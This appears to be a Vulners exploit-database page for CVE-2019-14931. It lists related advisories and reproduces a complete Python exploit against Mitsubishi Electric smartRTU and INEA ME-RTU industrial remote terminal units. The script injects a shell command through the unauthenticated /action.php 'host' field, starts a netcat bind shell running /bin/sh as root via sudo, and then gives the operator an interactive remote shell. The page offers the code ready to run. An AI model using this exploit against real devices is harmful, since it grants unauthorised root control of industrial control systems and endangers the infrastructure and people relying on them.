Vulners
Lucene search
Mitsubishi Electric smartRTU / INEA ME-RTU - Unauthenticated OS Command Injection Bind Shell
| Reporter | Title | Published | Views | Family All 13 |
|---|---|---|---|---|
 | CVE-2019-14931 | 15 Oct 202015:07 | – | circl |
 | Mitsubishi Electric smartRTU and Inea ME-RTU Operating System Command Injection Vulnerability | 15 Aug 201900:00 | – | cnvd |
 | CVE-2019-14931 | 28 Oct 201912:07 | – | cve |
 | CVE-2019-14931 | 28 Oct 201912:07 | – | cvelist |
 | Mitsubishi Electric smartRTU INEA ME-RTU - Unauthenticated OS Command Injection Bind Shell | 12 Aug 201900:00 | – | exploitpack |
 | Mitsubishi Electric Europe B.V. smartRTU and INEA ME-RTU | 9 Sep 202100:00 | – | ics |
 | CVE-2019-14931 | 28 Oct 201913:15 | – | nvd |
 | CVE-2019-14931 | 28 Oct 201913:15 | – | osv |
 | Command injection | 28 Oct 201913:15 | – | prion |
 | PT-2019-13873 · Mitsubishi · Me-Rtu | 28 Oct 201900:00 | – | ptsecurity |
10
#!/usr/bin/python
# Exploit Title: Mitsubishi Electric smartRTU & INEA ME-RTU Unauthenticated OS Command Injection
# Date: 29 June 2019
# Exploit Author: (@xerubus | mogozobo.com)
# Vendor Homepage: https://eu3a.mitsubishielectric.com/fa/en/products/cnt/plcccl/items/smartRTU/local
# Vendor Homepage: http://www.inea.si/en/telemetrija-in-m2m-produkti/mertu-en/
# Firmware Version: Misubishi Electric 2.02 & INEA 3.0
# CVE-ID: CVE-2019-14931
# Full write-up: https://www.mogozobo.com/?p=3593
import sys, os, requests, socket
os.system('clear')
print("""\
_ _
___ (~ )( ~)
/ \_\ \/ /
| D_ ]\ \/ -= Bind_Me-smartRTU by @xerubus =-
| D _]/\ \ -= We all have something to hide =-
\___/ / /\ \\
(_ )( _)
@Xerubus
""")
host = raw_input("Enter RTU IP address: ")
port = raw_input("Enter bind shell port number: ")
php_page = '/action.php'
url = "http://{}{}".format(host, php_page)
payload = {'host' : ';sudo /usr/sbin/service ../../bin/nc -nvlp '+port+' -e /bin/sh&PingCheck=Test'}
print "\n[+] Building payload"
print "[+] Sending payload"
print "[+] Attempting connection to smartRTU"
try:
r = requests.post(url, data=payload, timeout=1)
except:
pass
port = (int(port))
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
try :
print "[+] Connected to the smartRTU!\n"
while 1:
cmd = raw_input("(smartRTU-shell) # ");
s.send(cmd + "\n");
result = s.recv(1024).strip();
if not len(result) :
print "\n[!] Play nice now skiddies....\n\n"
s.close();
break;
print(result);
except KeyboardInterrupt:
print "\n[+] ^C Received, closing connection"
s.close();
except EOFError:
print "\n[+] ^D Received, closing connection"
s.close();
except socket.error:
print "[!] Failed to connect to bind shell."Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
12 Aug 2019 00:00Current
9.8High risk
Vulners AI Score9.8
CVSS 3.19.8
CVSS 210
EPSS0.60767